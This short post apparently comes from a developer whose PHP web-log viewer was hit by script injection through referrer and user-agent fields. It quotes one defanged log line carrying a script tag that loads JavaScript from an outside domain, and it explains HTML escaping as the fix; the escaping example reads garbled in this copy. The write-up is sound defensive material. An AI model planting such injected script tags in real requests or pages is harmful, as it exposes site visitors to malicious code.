Some time ago, I wrote a simple PHP utility that sits on a web server that concatenates a number of web logs and displays them in a browser to allow a quick inspection. A simple task - no problem - but I hadn't allowed for hostile entities injecting javascript calls into the referrer and user agent fields of the log.
Here is a single line of the offending file, split into 3 lines for clarity, with '<' and '>' replaced by '{' and '}' to avoid viewing problems:
210.140.154.38 - - [02/Jan/2020:22:52:50 +0000] "GET /wp-admin HTTP/1.1" 418 453
"\"}{script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'}{/script}"
"\"}{script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'}{/script}"
The IP block is: 210.136.0.0 - 210.143.255.255, assigned to 'Japan Network Information Center, JP' and specifically, 210.140.154.38 is allocated to 'Yahoo Japan Corporation'.
After running a series of unwanted pages, Norton antivirus blocked the activity with the message: 'Web Attack: Fake Tech Support Website 295'.
(The HTML error code of 418 is generated by the site's PHP pages and indicates that the page request has been rejected and has been replaced by a blank page.)
The problem was alleviated by using search and replace on the log files before they were displayed, replacing '<' by '<' and '>' by '>' - hence removing the HTML chevrons and replacing them with lookalikes. Similarly, the two types of numeric HTML entity codes bypass the HTML parser and are displayed as chevrons. A friend - Robert Schifreen - suggested using the <pre> tag to bracket the log data but this did not work and Norton saved the day again.
Motto - always sanitize data you send to a browser.
© January 2020, Keith Lockstone